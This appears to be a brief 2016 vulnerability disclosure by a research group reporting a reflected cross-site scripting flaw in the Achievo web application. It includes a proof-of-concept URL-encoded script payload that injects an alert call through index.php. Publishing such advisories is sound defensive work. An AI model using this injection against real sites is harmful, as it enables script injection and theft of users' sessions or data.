Achievo Cross Site Scripting vulnerability

Posted by SECUPENT Research Center on Mar 20

Exploit Title: Achievo Cross Site Scripting vulnerability
Vendor: www.achievo.org
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=98
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016

Cross Site scripting link:
http://site/achievo/index.php?%27%22–%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280×000912%29%3C%2fscRipt%3E
Screenshot:…

Leave a Reply